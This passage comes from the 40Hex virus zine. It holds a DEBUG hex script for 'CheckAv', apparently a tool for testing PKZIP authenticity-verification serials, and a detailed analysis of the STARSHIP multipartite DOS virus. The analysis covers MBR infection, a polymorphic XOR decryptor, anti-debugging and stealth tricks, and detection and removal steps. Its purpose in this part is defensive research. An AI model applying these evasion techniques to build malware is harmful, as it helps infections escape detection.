e 08D0  3A 20 2F 42 20 23 23 23 23 23 23 23 23 23 23 0D
e 08E0  0A 24 42 65 67 69 6E 6E 69 6E 67 20 73 65 61 72
e 08F0  63 68 20 61 74 24 55 6E 6B 6E 6F 77 6E 20 70 61
e 0900  72 61 6D 65 74 65 72 3A 20 2F 00 0D 0A 24 50 61
e 0910  72 61 6D 65 74 65 72 73 20 61 72 65 3A 0D 0A 2F
e 0920  3F 20 20 20 20 20 20 20 20 20 20 44 69 73 70 6C
e 0930  61 79 20 74 68 69 73 20 73 63 72 65 65 6E 0D 0A
e 0940  2F 42 20 23 23 23 23 23 20 20 20 20 42 65 67 69
e 0950  6E 20 61 74 20 23 23 23 23 23 0D 0A 2F 53 20 20
e 0960  20 20 20 20 20 20 20 20 73 75 70 70 72 65 73 73
e 0970  20 6F 75 74 70 75 74 0D 0A 24 1A 1A 1A 1A 1A 1A
40Hex Number 8 Volume 2 Issue 4                                       File 004

                 -=PHALCON/SKISM=- Presents CheckAv
                     PD War Collection Program 3
                          By Dark Angel

    Once again, not an incredibly impressive program, but it is still
quite useful.  It PutAv's a serial number, pkzips a test file, with the
pkzip -! option, then unzips it.  It logs the line that has serial
number.  This program requires pkzip, pkunzip, putav and avs.dat from
    It is a very crude program, but it was done in quite a hurry, as
I am going away for a while.  Run it in a RAM disk, as it is much

n checkav.com
e 0100  BA F7 02 B4 4A BB 00 10 CD 21 72 34 BA 83 02 E8
e 0110  6C 01 BA 14 03 E8 66 01 B4 0A BA 9A 04 CD 21 BA
e 0120  3C 03 80 3E 9A 04 00 74 76 BB 9C 04 8B D3 A0 9B
e 0130  04 98 03 D8 C6 07 00 B8 00 3D CD 21 BA 5E 03 93
e 0140  72 5D B4 3F B9 3C 00 BA BC 04 CD 21 87 D7 BA 7D
e 0150  03 0B C0 74 4A B8 00 42 33 C9 99 CD 21 FC BA 9F
e 0160  03 B9 3C 00 B0 0D F2 AE 0B C9 74 33 BA D3 03 E8
e 0170  0C 01 4F C6 05 24 BA BC 04 E8 02 01 C6 05 0D 8B
e 0180  D7 81 EA BA 04 89 16 F8 04 B8 00 42 33 C9 CD 21
e 0190  BA D6 02 E8 E8 00 BA 82 04 E8 BA 00 E8 13 00 E8
e 01A0  DC 00 B4 41 BA 8A 04 CD 21 B4 41 BA 8F 04 CD 21
e 01B0  CD 20 B4 3F B9 0D 00 BA EF 03 CD 21 0B C0 74 3A
e 01C0  BA E5 03 E8 B8 00 E8 A2 00 E8 32 00 BE EF 03 BF
e 01D0  09 04 B9 0B 00 F3 A4 BE 03 04 E8 52 00 E8 8B 00
e 01E0  BE 20 04 E8 49 00 E8 82 00 BE 34 04 E8 40 00 E8
e 01F0  79 00 BE 51 04 E8 37 00 EB B8 BA B8 03 C3 53 B4
e 0200  3C BA FE 03 33 C9 CD 21 93 B4 40 8B 0E F8 04 49
e 0210  BA BC 04 CD 21 B4 40 B9 0C 00 BA EF 03 CD 21 B4
e 0220  40 B9 01 00 BA FD 03 CD 21 B4 3E CD 21 5B C3 50
e 0230  53 51 52 1E 06 55 57 89 26 FC 04 8C 16 FA 04 CD
e 0240  2E FA 2E 8E 16 FA 04 2E 8B 26 FC 04 FB 5F 5D 07
e 0250  1F 5A 59 5B 58 C3 53 B8 00 3D CD 21 73 06 B4 3C
e 0260  33 C9 CD 21 93 B4 3E CD 21 5B C3 B4 06 B2 FF CD
e 0270  21 74 0A 3C 1B 75 06 BA D9 02 E9 22 FF C3 B4 09
e 0280  CD 21 C3 43 68 65 63 6B 41 56 20 76 65 72 73 69
e 0290  6F 6E 20 31 2E 30 0D 0A 62 79 20 44 61 72 6B 20
e 02A0  41 6E 67 65 6C 20 6F 66 20 50 48 41 4C 43 4F 4E
e 02B0  2F 53 4B 49 53 4D 0D 0A 50 72 65 73 73 20 45 53
e 02C0  43 20 74 6F 20 61 62 6F 72 74 20 61 74 20 61 6E
e 02D0  79 20 74 69 6D 65 0D 0A 24 45 53 43 61 70 65 20
e 02E0  64 65 74 65 63 74 65 64 2E 20 20 41 62 6F 72 74
e 02F0  69 6E 67 2E 0D 0A 24 45 72 72 6F 72 20 72 65 61
e 0300  6C 6C 6F 63 61 74 69 6E 67 20 6D 65 6D 6F 72 79
e 0310  2E 0D 0A 24 45 6E 74 65 72 20 74 68 65 20 6E 61
e 0320  6D 65 20 6F 66 20 74 68 65 20 66 69 6C 65 20 74
e 0330  6F 20 70 72 6F 63 65 73 73 3A 20 24 0D 0A 4E 6F
e 0340  20 69 6E 70 75 74 20 64 65 74 65 63 74 65 64 2E
e 0350  20 20 41 62 6F 72 74 69 6E 67 21 0D 0A 24 0D 0A
e 0360  46 69 6C 65 20 6E 6F 74 20 66 6F 75 6E 64 2E 20
e 0370  20 41 62 6F 72 74 69 6E 67 2E 0D 0A 24 0D 0A 54
e 0380  68 65 20 66 69 6C 65 20 69 73 20 7A 65 72 6F 20
e 0390  62 79 74 65 73 2E 20 20 44 69 65 21 0D 0A 24 0D
e 03A0  0A 54 68 65 20 66 69 6C 65 20 69 73 20 69 6E 76
e 03B0  61 6C 69 64 2E 0D 0A 24 0D 0A 43 68 65 63 6B 41
e 03C0  56 20 72 75 6E 20 63 6F 6D 70 6C 65 74 65 64 2E
e 03D0  0D 0A 24 0D 0A 0D 0A 54 65 73 74 69 6E 67 20 66
e 03E0  6F 72 3A 20 24 43 68 65 63 6B 69 6E 67 20 23 00
e 03F0  00 00 00 00 00 00 00 00 00 00 00 00 24 1B 74 65
e 0400  73 74 00 1B 65 63 68 6F 20 00 00 00 00 00 00 00
e 0410  00 00 00 00 20 3E 3E 20 72 65 73 75 6C 74 73 0D
e 0420  12 70 75 74 61 76 20 3C 20 74 65 73 74 20 3E 20
e 0430  6E 75 6C 0D 1B 70 6B 7A 69 70 20 2D 21 6F 20 74
e 0440  6F 6D 72 6F 74 20 74 65 73 74 20 3E 20 6E 75 6C
e 0450  0D 2F 70 6B 75 6E 7A 69 70 20 74 6F 6D 72 6F 74
e 0460  20 2D 74 20 7C 20 66 69 6E 64 20 22 41 75 74 68
e 0470  65 6E 74 69 63 22 20 3E 3E 20 72 65 73 75 6C 74
e 0480  73 0D 72 65 73 75 6C 74 73 00 74 65 73 74 00 74
e 0490  6F 6D 72 6F 74 2E 7A 69 70 00 20 1A 1A 1A 1A 1A
40Hex Number 8 Volume 2 Issue 4                                       File 005

           STARSHIP - interesting file-boot virus.
                         Muttik I.G.
                (Internet: MIG@politon.msk.su)


     Virus, DOS, executable file, masterboot record,
     resident in memory, encryption.


STARSHIP virus (file and boot simultaneously) is described. It
infects IBM  PC and  compatibles running  DOS. Virus is called
STARSHIP :  this string can be easily found in the memory dump
of virus.  Virus infects  masterboot record  on  harddisk  and
executable files  files created on floppy drives. The virus is
encrypted. Infected executable files have no descriptor longer
than 2  bytes. Virus  appears to  have no destructive code, it
uses  music  and  video  effects  when  active.  The  abnormal
operation of the infected computers was sometimes detected.


     History of  computer viruses  is very  short.  The  first
known publications  are dated  with 1984-1985  [1,2]. But  now
situation in this field changes every day - uncountable number
of various  computer viruses  are  known  at  present  in  DOS
operating system.  The variety  of known viruses is fantastic,
but all  of them  falls into  three  known  categories:  file,
boot [3,4] and cluster. Active area of the first virus type is
executable files  and of  the second  type -  boot records  on
harddisks and  diskettes. The  third category is not yet over-
populated, the only representative is bulgarian DIR-II virus.
     Probably the  first virus  which infects  files and  boot
sectors was  Ghost virus  [5]. This  virus was  discovered  by
Fridrik Skulason  at Icelandic University. Ghost virus infects
only COM  files. This virus increases file size by 2351 bytes.
When active  the Ghost replaces boot sector of infected system
with a  boot virus  similar to  Ping Pong, but this boot virus
does  not   have   infection   routine.   The   Ghost   virus,
consequently, may  be considered  as a file virus with unusual
active phase.  After some  time appeared Virus-101, Frodo and,
finally, a  bunch of new viruses was found: Thanksgiving virus
(V-1),  TEQUILA   and  STARSHIP  (these  type  of  viruses  is
sometimes called "multi-partite").
     STARSHIP virus  was found  in  Moscow  in  January  1991.
Probably this virus was written in the USSR.
     The living cycle of STARSHIP virus is the following. When
infected file  is started  it modifies masterboot record (MBR)
on the harddisk and writes virus on the disk. Thereafter, when
computer reboots, virus intercepts interrupt vectors 13h (low-
level disk I/O) and 21h (DOS service). During the reboot virus
is stored in the videomemory at address BB00:0. It is moved to
the core  RAM later, when the first program terminates. Now it
stays resident  and infects any COM/EXE file created on floppy


     Length of STARSHIP virus in memory is 2688 bytes. Size of
code is 2560 bytes, buffers and variables takes the remainder.
On harddisk virus takes 3072 bytes (6 sectors * 512 bytes).
     Virus layout  is shown  in Table.1  and its  memory  dump
(fragmentary) is  presented  in  Figure.1.  (NOTE:  All  dumps
presented is  the article  are partial in order to prevent the
possibility to use for generation of new viruses.)
     No text  messages except  one  string  ">STARSHIP_1<"  of
length 12  (found only in memory) were discovered. This string
can be  found only  in memory, because virus is stored on disk
and in the infected file in encrypted form.
     Normally virus stays resident and the size of used memory
block is  B00h=2816. The beginning of this memory block is the
Program Segment  Prefix (PSP)  of program  that triggered  the
installation of virus in the core RAM. Really virus is started
at offset  80h in  this PSP (consequently, the real virus size
is: B00h-80h=A80h=2688 bytes).
     Virus uses  standard interrupts  13h, 20h,  21h, 27h  and
creates its own interrupts F9h and FCh (see later). When virus
is already  resident (installed  in the core RAM) it uses only
13h and  21h vectors.  Entry points of both interrupt handlers
can be  easily found  (CS:005F and CS:00C5; here CS represents
the code segment where virus resides).
     In the  memory dump of virus one can found the buffer for
the filename  (see ASCIIZ= 'B:\TMP\DROZFILA.COM' at CS:000D in
     Virus  extensively   uses  its   internal  random  number
generator. The  random number  seed is  taken from  BIOS timer
variable  (0:46Ch).   Random  generator   is  used   for   the
demonstration of  video effect and while creating the infected
file (change  of size  is random  and virus  code is encrypted
using random number). The word "random" may be a real motto of
the described  virus -  it uses  random number  generator very
     The part  of virus  memory image  is encrypted  using XOR
function (approximately 60% of total virus size). This section
is decrypted  and used  only while infecting files (section is
marked in  Table.1 with the box). After infection of each file
the XOR  mask is changed, and encryption is performed with the
new mask.  Described procedure  makes  the  encrypted  section
volatile and unreadable. This behavior is not used to hide any
strings in  virus body  (there are  no strings  at all, except
virus  name)  -  maybe  it  is  implemented  only  to  achieve
permanent variance.
     Virus uses  trace capabilities  of processor to determine
the original  BIOS interrupt  13h entry  point.  Virus  issues
int 13h with  trace flag  set and  records the  CS:IP when  CS
becomes greater  or equal  to C800h  (corresponds to  the  ROM
area). However  this method  seems to be non-universal. I have
investigated the  process of  disk infection  and  found  that
rewriting of  MBR sometimes  triggered the  resident antivirus
utilities (program  TSAFE:  Turbo-Anti  Virus  Ver.6.80A  from
CARMEL Software Engineering, Israel).
     While disassembling  the virus  I have found special code
inserts used  to  fool  disassemblers.  In  most  cases  these
inserts uses  non-working calls  and  jumps  pointing  on  the
garbage in  the virus  body. These  inserts are a real problem
for disassemblers  and I  have not  found one  that managed to
correctly separate  code and  data (or  code and garbage). The
intelligent analysis of code is needed, which is not performed
by  all   available  disassemblers  (including  smart  SOURCER
ver. 3.07, by V Communications Inc.).
     I have  carefully examined  the reconstructed  source and
established that STARSHIP virus appears to have no destructive


     Strategy of  file infection  is the  following. Files are
infected while  creation of  EXE/COM file  on A:  or B: disks.
Virus records  file name  in internal buffer (at CS:000D), and
starts infection  routine when  request to  close the file was
issued. This  technique is  similar to the method used by Dark
Avenger virus [3,5,7].
     The idea  to infect only executable file that are created
on floppy  disks explains  why STARSHIP does not intercept int
24h. This  interrupt is  usually catched by viruses to prevent
message - "Write  protect error". But when file is created (!)
on the  floppy disk  it automatically  indicates that the user
has removed (or will remove) the write protect tab.
     Change of infected file size is true random (for the same
file you  can get  many variants  of infection  with different
size growth). Change of size is typically 2616...2648 bytes.
     Virus infects  COMMAND.COM file  when it  is  created  on
floppy disk.  No special  strategy is  used to  infect command
interpreter - it is infected as a simple .COM file.
     When infecting executable (only EXE and COM) files, virus
preserves attribute.  If the file is readonly - this attribute
remains  unchanged  after  infection.  STARSHIP  examines  the
executable file  type by its contents, not by extension (tests
for 5A4Dh  at file  beginning, but  it does  not test  4D5Ah).
Virus does  not infect  short files  - see Table 2. Virus does
not infect  the files  that are  already infected.  Buffer  at
virus end  is used  to read  code beginning  and determine the
presence of  virus (it  seems to  me that virus may frequently
regard uninfected  files as infected, because it performs very
primitive analysis).
     Virus infection  routine uses  the following  interrupts:
int F9h (it points on the original int 21h, as set by DOS) and
int FCh  (points on  original int  13h, as set by BIOS). These
interrupts are used instead of int 21h and 13h. This technique
is probably  used to  prevent triggering  of certain antivirus
utilities. These  utilities often  controls all invokations of
21h and 13h interrupts. The infection routine appends virus to
the end  of executable  file and  adjusts  the  program  entry
     Executable files with COM extension are modified by virus
at first  3 bytes,  which are  replaced with  JMP instruction,
pointing on  the decryptor.  Original 3  bytes from file start
are stored at the very end of the infected file (like the body
of virus these bytes are encrypted with XOR function).
     After modification  of the  EXE  file  header  new  CS:IP
points on  the virus decryptor. SS, SP and MINALLOC fields are
changed. Original  CS, IP,  SS and SP are stored at the end of
the virus  body at  offset A4Fh  (you cannot fetch these bytes
directly - they are encrypted).
     The header  of the  infected EXE  file has  some  special
features. Instruction  pointer always  follows  the  relation:
4<IP<13h. Spacing  between stack  segment and  code segment is
constant: SS-CS=100h  and  stack  pointer  is  always  set  to
SP=800h. Moreover,  STARSHIP does  not infect  EXE files  when
MAXALLOC field  of EXE  header is less than 0FFFFh. Virus does
not infect files with nonzero overlay number.
     Virus code  is added  to the end of file in the encrypted
form.  This  encrypted  code  goes  after  special  decrypting
program (decryptor). The purpose of decryptor is to decode the
virus body.
     Decryptor of  virus body  seems to  be specially designed
not to  have  a  characteristic  bytes  sequence  (descriptor)
longer than  2 bytes  (for example:  XOR BH,BH and MOV BL,6 is
used instead  of MOV BX,0006,  because first commands occupies
2-bytes, but  the last takes 3 bytes). In reality this program
is mixed  with NOPs  and other 1-byte codes, not affecting the
execution of decryptor. The sequence of operators in main code
is fixed,  but spacing  between these  operators is  variable.
Described technique  really eliminates the possibility to find
virus using search based on certain descriptor, because any 2-
byte sequences  are found  on the  disk too frequently. Search
based on  the wildcard  strings must  take into  account  that
spacing between operators in virus code is variable (from 0 to
16 bytes of NOPs and other silly stuff).
     Moreover, the  decryptor  uses  synonyms  for  code:  for
example the XCHG AX,SI command has three (!) different machine
code representations  (0c687h,  0f087h,  96h  means  the  same
processor directive  -  XCHG AX,SI).  As  well  MOV AX,SP  and
MOV BX,AX has  two representations. That fact also complicates
search based on the wildcard strings, producing many different
wildcards for the same virus.
     First  the  decryptor  must  determine  its  position  in
memory, because  all references  in the virus must be relative
to  the   known   point.   STARSHIP   uses   unusual   method,
simultaneously suppressing  the attempts  to  trace  execution
flow of  decryptor with  the use of debugger. Virus issues int
03h (it  usually points  on IRET)  and then  reads the  return
address below (!) the stack pointer SP (LODSW SS:[SI]). If you
use the  debugger, it will immediately destroy all words below
the SP, resulting in the malfunction of the rest of decryptor.
Sometimes instead of int 03h virus uses interrupts 01h/11h/12h
as the dummy calls.
     Decryption of  virus code attached to infected executable
file is done from top addresses to bottom. This sequence makes
tricky setting of breakpoint after the decryption loop because
the last  decrypted byte is just below the loop. Hence, if you
place here  the breakpoint  it will  be  decrypted,  its  code
(0CCh) will  become garbage  and will  be executed  instead of
invokation of breakpoint routine.
     All general  processor registers  are set  to zero  after
decryption process prior to start of infected program. Segment
registers are preserved.
     When  I  used  MS-Windows  or  any  other  graphics  user
interfaces -  infection of  copied files  does not take place.
That is  possibly because  virus uses videomemory as temporary
buffer while  infecting files  and checks the videomode before


     When decryptor  finished its work it transfers control to
the disk  infection routine. First this code tests DOS version
number (virus works only with versions later than 2.0) and the
presence of video-RAM at BB00:0 (virus physically tests memory
existence at  this address  via MOV/CMP sequence). Second - it
tests if  virus is  already resident  (checks if special virus
memory dispatcher  is present at address 0000:04B0). And third
- STARSHIP determines the original int 13h entry point in BIOS
(it traces  the call of int 13h, function 8; this call is used
to determine  the physical  disk size).  The  fourth  -  virus
infects the masterboot via direct call of BIOS int 13h.
     STARSHIP  modifies   MBR  in   only  3  bytes:  head  and
sector/cylinder of  DOS boot.  Virus  places  its  code  in  6
consecutive sectors at the disk end (it uses physical disk #1,
last head,  last track  and last 6 sectors in the last track).
After modification  of MBR,  boot field  of  active  partition
points on pseudoDOS boot, the first of used 6 sectors. Dump of
pseudoDOS boot  is presented  in Figure  2. First  5 bytes  in
pseudoDOS boot  are equal  to the  original DOS boot beginning
(0EBh, 034h,  090h, 'MS').  The pseudoDOS  boot  contains  the
loader of virus code that is located in next 5 sectors. (Note:
the area at offset 115h..1F9h in pseudoDOS boot is filled with
     Counter of  reboots (byte)  is located  at offset 1FCh in
pseudoDOS boot.  This counter is initialized with random value
in range  0...20h. Sometimes  it is initialized with 0FFh - in
this  case  the  counter  is  not  incremented  during  reboot
(probably such  computer cannot  be ill).  The probability  of
this case is approximately 30%.
     At offset  1FDh in pseudoDOS boot the XOR mask (byte) can
be found.  This mask  is used  for  decryption  of  5  sectors
following pseudoDOS boot (these sectors contains virus body).
     Moreover, I  have found  in pseudoDOS  boot the code that
loads and  executes unknown  procedure from  sectors 2...6  on
head 0  and track  0. Code from these sectors is executed only
if its  checksum is  valid. This  space between  MBR and first
partition (it  normally starts  on head 1, track 0) is usually
unused and  filled with zeros. This area is frequently used by
some computer viruses [3] (DiskKiller for example). But I have
not detected any valuable code in these sectors - this unknown
procedure was probably written only to fool the researchers or
for futer virus extension.
     Upon infection virus stores no original MBR copy. It only
saves changes  -  3  bytes  of  original  DOS  boot  head  and
sector/cylinder (stored  under XOR  mask inside  5 sectors  of
virus code). If you want to get these parameters you must read
XOR mask from pseudoDOS boot, decrypt the virus body and fetch
necessary 3 bytes from the appropriate positions.
     There is  another method  to restore original MBR. If you
perform the  request  to  read  MBR  (AX=201h,  CX=1,  DX=80h,
ES:BX=buffer) via  int 13h:  virus will read real MBR, restore
its original  contents and  you will obtain what you want. You
can save  this MBR  copy on  disk, reboot  from uninfected DOS
diskette and  write it  back on  harddrive instead of infected
MBR. This  method works fine and we used it successfully prior
to creation  of removing utility. The only disadvantage of the
described method is that it takes too much time.


     When computer  reboots the pseudoDOS boot is executed. It
loads virus  code in  videomemory (at  address BB00:0000).  PC
without videomemory  at segment  BB00 are not infected (I have
no computer  with monochrome  display adapter  so the test was
not  really   performed).  Then   it  decrypts   the  code  in
videomemory, intercepts  int 13h  and creates  special  memory
dispatcher at  address 0000:04B0.  The dispatcher structure is
shown in Fig.3a.
     Now all  accesses to  disk are  controlled with the virus
patch on  interrupt 13h. This code filters all accesses to MBR
and last  6 sectors  on disk.  The MBR now looks unchanged and
all writes to last 6 sectors are impossible (error flag is not
returned).   Described    technique   preserves   virus   from
modification, since its code is installed in DOS file area.
     After installation  in videomemory  virus examines if DOS
interrupts (20h, 21h, 27h) are set. This technique seems to be
universal :  I have  tested DOS versions 2.0, 2.11, 3.0, 3.30,
4.0 and  virus successfully  intercepts DOS  interrupts. Virus
hanged during reboot only with MS-DOS version 5.00. Section of
virus implementing  the task  of DOS interception analyses the
validity of  CS in  the vectors table for DOS interrupts (20h,
21h, 27h) to determine if it is safe to intercept DOS vectors.
     DOS interrupt  21h is  intercepted by STARSHIP before any
programs can  do the  same from CONFIG.SYS or AUTOEXEC.BAT. So
any resident  software vaccine  programs  ANTI4US2,  FLOSERUM,
TSAFE or  others, including programs with driver anatomy would
be unable to detect the operation of virus.
     After the  interception of DOS interrupts virus waits for
the termination  of  first  program.  It  test  the  calls  of
interrupts 20h,  27h and  of the DOS functions 0, 31h and 4Ch.
When Exit_to_DOS  request was  issued virus body is moved from
videomemory to  the core memory. If terminated program remains
resident virus  expands its  memory block  (glues to  resident
tail). If  program simply  returns to  DOS (AH=0, AH=4C) virus
substitutes the exit request with the TSR request (AH=31h) and
creates its own memory block. At this moment memory dispatcher
is modified to point on the new interrupt routines in the body
of virus.  From this moment virus stops controlling interrupts
20h and  27h.  It  uses  now  only  13h  and  21h  interrupts.
Dispatcher layout  after the shift of virus to the core RAM is
presented in Fig.3b.
     If the  first loaded program uses graphics - the virus is
erased from  videomemory, but  it can  survive because  it has
special restoring procedure (int B0h, at address 0000:02C0, in
the vectors  table). That  is exotic  -  the  whole  interrupt
service routine is located in the interrupt table (it occupies
approximately 3  paragraphs and  covers  interrupts  B0...BB).
This routine  checks presence  of  virus  in  videomemory  (in
reality only  one word of videomemory is checked) and if virus
image was  destroyed all 5 sectors with virus program are read
to videomemory  and decoded (remember that disk image of virus
is XOR-encrypted).  Computer hangs  only if  graphics is  used
simultaneously with  accesses to DOS, but this situation seems
to  be  exceptional,  because  programs  usually  included  in
AUTOEXEC.BAT rarely use graphics.
     The performing of all these tests on the infected machine
was very  useful and  exciting  when  the  very  first  loaded
program was DEBUG (you must remove or rename AUTOEXEC.BAT; you
can also  place DEBUG  as  the  first  line  of  your  current
AUTOEXEC.BAT). All  virus structures  were easily located. The
most interesting  were attempts  to  erase  virus  image  from
videomemory -  virus immediately  restores its  code. In DEBUG
you can  investigate the  process of virus installation in the
core RAM.  You only  need to trace the request of DOS function
4Ch (terminate) - and you will see how virus code is moved and
how its memory dispatcher is modified.
     After the  installation of virus in the core RAM it waits
for the  creation of any executable files on the floppy drives
A: and  B:. This  is usually done with DOS "copy" command when
destination file is located on floppy disk.


     The evil  happens when  reboots counter reaches 80 (while
initial reboot  counter is  in range  0..31). Disease  appears
after few  hours since  reboot and  this delay  depends on the
disk activity.  Virus plays  music  tones  and  drops  colored
points (ASCII=250)  without affecting  of  screen  background.
Each point  and each  tone corresponds  to  one  disk  access.
Frequency of  tones seems  to be  proportional to  the  seccyl
parameter (CX) of int 13h. This musical and visual effect does
not take place in any graphics modes. Colored points appearing
at random  screen positions  does not  affect  pseudographics.
Sometimes dots  are substituted  by spaces.  This video effect
corrupts  the   screen  in   text  mode   resulting   in   the
impossibility of using intensive disk accesses.
     When disks  are inactive  all operates correctly. You can
also use virtual disks or cache without any problems.
     Reboot temporary suspends virus activity.
     But remember  that infected  computer will  reach  active
phase  only  with  approximate  probability  2/3.  In  certain
infected computers triggering of virus is blocked! Behavior of
infected computer  depends on  the initial  value  of  reboots


     When STARSHIP infects harddisk it rewrites 6 last sectors
on the  disk. The  contents of these sectors are unrecoverably
     Moreover, virus  controls all disk accesses (via int 13h)
to prevent  the rewrite  of its code (all writes to virus area
are simply  ignored; error  condition is not returned). But if
you load  DOS from floppy disk and then modify this restricted
zone (for  example if  you write file and it occasionally will
occupy the  last cluster  on the harddisk) - computer will not
reboot later  and hang.  You will  need  to  recreate  MBR  to
overcome this problem.
     I have  determined that  the problem  may appear when the
first used  program is  MARK (by  TurboPower  Software).  This
program is  used in  combination with  RELEASE to  remove  all
resident utilities  that were  loaded after  MARK, to save and
restore the  interrupt vectors  table and state of EMS memory.
When MARK remains resident virus glues to its memory block and
everything is  correct. But  when you start RELEASE - computer
hangs. This  happens because  RELEASE restores  the interrupts
table in  its state before (!) shift of virus to the core RAM,
when virus  was in  videomemory. Consequently, vectors 13h and
21h  after   RELEASE  points   on  videomemory   where  is  no
appropriate handlers  at this  moment -  computer  immediately
     Probably, if  you replace  your CGA,  EGA or  VGA adaptor
with MDA, your computer will hang after power-up because there
will be  no space  to store virus during reboot. (Virus checks
videomemory existence only once - prior to disk infection.)
     The use of special restoration procedure at address 0:2C0
in the  interrupt vectors  table must cause the malfunction of
computers that  uses vectors  B0...BB  during  reboot.  (These
vectors are  used by  virus only  during reboot,  when special
restoration procedure  is located at address 0:2C0. When virus
goes resident  in conventional  memory all  these vectors  are
cleared with zeroes!)
     I have  detected that  some XT  computers  with  RAMDRIVE
driver  in  the  CONFIG.SYS  did  not  execute  some  programs
(Harvard Graphics, MS-FORTRAN, QuickBASIC).
     Some users  have reported the problems with the reboot of
infected PS/2 model 30.
     These examples  establishes the  rule - remove virus when
you  fixed  its  presence.  There  are  no  harmless  viruses.
Remember: any infected program may produce malfunction of your


     STARSHIP virus  has one  special feature  - it  does  not
modify any  executable file  on the  harddisk. So  if you  use
passive virus detectors (based on the generation of CRC checks
for the  files) to test your harddisk - you will never get the
warning about  virus activity.  Each file on the harddisk will
remain unchanged.  Additionally, if  this utility examines the
contents of  MBR and  DOS boot  sector, it will not inform you
about the  infection if it uses simple interrupt 13h. STARSHIP
will substitute  infected MBR with the original in each access
to MBR via int 13h.
     How to  detect the  presence of  STARSHIP? It  is a  real
problem, because  the search  of infected  files based  on the
virus descriptor  is impossible.  No standard  software can be
used to  found  STARSHIP.  Only  specially  designed  scanning
programs that  analyses the  contents of the EXE header or the
code at the file entry point are useful.
     Here follows  some useful  hints  that  may  be  used  to
determine the presence of STARSHIP virus.
     If  you  have  antivirus  program  AIDSTEST  by  Lozinsky
(version later than 115, April 1991) it can scan and desinfect
files (AIDSTEST  calls virus  "STARSHIP-2616").  Sometimes  it
refuses to  desinfect file  and reports something like "Cannot
remove virus. Delete file(Y/N)?".
     If you  reboot from original DOS diskette and start FDISK
- it  shows (Display Partition Information) that Start and End
of DOS partition are equal for the infected harddisk.
     You can  also detect  the presence  of STARSHIP  virus in
memory if  you examine  (unassemble) RAM  contents at  address
0:4B0 with the help of DEBUG (compare with Fig.3).
     Typically executable  files has  text messages, tables or
zeros at  the end.  So you  can visually  examine the  tail of
executable file  and if  you will see approximately 2.7 kbytes
of garbage  - that  is suspicious  and  you  may  suggest  the
presence of  virus. Experienced  programmers may  also inspect
the  program   entry  point   with  DEBUG   and  analyse   the
disassembled listing.
     I also  recommend not  to copy  executable files  on  the
floppies  directly.   Use  archive  utilities  and  then  copy
archives on  the floppies.  This sequence saves disk space and
also preserves  from file  infection. But  this method has one
disadvantage. If the initial file is already infected you will
not be  able to  detect the  presence of  virus because  it is
incorporated into the archive in compressed form.
     The identification  of STARSHIP  virus is complex because
it extensively  uses XOR  coding and uses random masks. In the
infected file 100% of virus is encrypted. On disk - 5/6 and in
memory - approximately 60%. That is very interesting feature -
virus is  not available  in pure form, being variable on disk,
in file and in memory.


     To  my   opinion  the   investigated  virus   is  a  very
interesting program.  Virus code  is highly  optimized on  the
machine-code level.  That was  possibly done to place the code
exactly into  5 sectors  on disk.  Virus uses various software
techniques,   it   has   antitracing   and   antidisassembling
organization,  it  has  no  descriptor.  These  measures  were
effective to  some extent,  because I  have some  problems  in
source reconstruction.  In many  cases the  source seems to be
not fully adequate.
     The present  stage of  virus technology  is characterized
with  the  complexity  of  virus  search,  identification  and
reconstruction. This  tendency to  create complex and sneakily
viruses seems  to be  general. For  example remember  the  XOR
coded 1701  virus group,  the Yankee  Doodle  [5,6]  group  of
viruses (called  also the  TP group  [3]) that  desinfects all
debugged infected files [3,5] and smart Century virus [7], SVC
series that  filters  all  accesses  to  the  directories  and
presents original file size for each infected file.
     The name  of virus  (STARSHIP_1) reveals  the idea of the
author to  extend the series. Be attentive, remember - the use
of backups may save you a vast of time.


     I   am   greatly   acknowledged   to   V.V.Snegirev   and
A.G.Yakovlev for  useful discussions.  I also like to thank my
wife Helen for her understanding and support.
     I am aknowledged to Vesselin Bontchev, who read the draft
variant of the paper and made many valuable comments.
     I  also  wish  to  acknowledge  the  sponsorship  of  NPO
"POLITON" (Moscow, USSR).


[1]  Dewdney A.K.,     In the  game called  Core  War  hostile
     programs  engage   in  a   battle  of   bits,  Scientific
     American, v.250,  5 (1984) 15-19.
[2]  Cohen F.,     Computer viruses:  theory and  experiments,
     Proc. 2nd  IFIP Int.  Conf. on  Computer Security, (1984)
[3]  Bezrukov N.N.,     Computer virusology. Part 1: Main work
     principles, classification  and catalog of viruses in DOS
     operating system,  Edition 3.6, date 18.07.1990. (In soft
     form : files of 745 kbytes total size, 250p. in Russian).
[4]   McBroom V.,     Computer viruses:  what they are, how to
     protect against  them,  Software  Protection,  v.VIII,  3
     (1989) 1-16.
[5]  Documentation to  VIRUSCAN software  package from  McAfee
     Assosiates. Version 4.3V66. File-SCANV66.DOC, size-38024.
[6]  McAfee J.,     The virus cure, Datamation, v.35, 4 (1989)
[7]  Documentation to  Turbo Anti-Virus  software package from
     CARMEL  Software   Engineering.  Version   6.80A.   File-
     README.DOC, size-65566.

Table 1. Layout and size of virus procedures.
(the box indicates the encrypted memory section)

  Size    Offset (hex)             Description

    3%    000 - 04F      Variables and buffers (see Fig.1)
    5%    050 - 0C1      Interrupt 13h handler
   10%    0C2 - 1C7      Interrupt 21h handler
   11%    1C8 - 312      Active part & check for DOS ready
    2%    313 - 340      Random number generator (RND)
    7%    341 - 3F7      Interrupts 20h, 21h, 27h handlers
 +--- encrypted --------------------------------------------+
 | 25%    3F8 - 692      Infector of EXE/COM file includes: |
 |     9%      3F8 - 4DD      input logic                   |
 |    10%      4DE - 5E9      create infected code          |
 |     6%      5EA - 692      output logic                  |
 |  3%    693 - 6E5      Tables                             |
 |  3%    6E6 - 738      Startup code for EXE/COM           |
 | 12%    739 - 88F      Infect disk                        |
 |  2%    891 - 8BF      Interrupt 01h handler (trace)      |
 | 11%    8C0 - 9D7      PseudoDOS boot and int B0h handler |
    4%    9D8 - A4E      Remover of code from videomemory
    2%    A4F - A8F      Buffers (CS, IP, SS, SP, etc.)


Table 2. Minimal and maximal sizes of infected
executable files.
       |  File type  |    Minimal   Maximal   |
       |             |    size      size      |
       |             |                        |
       |   .COM      |    1917      62202     |
       |             |                        |
       |   .EXE      |    1917      512 K     |


Figure 1. Memory block header (M-block) and memory dump of STARSHIP
virus located in core RAM. Virus uses segment 18FB, and its memory
block is at 18F2:0).

------------------- M-memory block containing virus --------------------------

18F2:0000  4D 08 00 B0 00 0A 00 A3-8E 0B A1 0C 00 A3 90 0B   M...............

------- PSP of file, which termination caused the virus installation ---------

18F3:0000  CD 20 A3 19 00 9A F0 FE-1D F0 2F 01 0B 18 3C 01   . ......../...<.
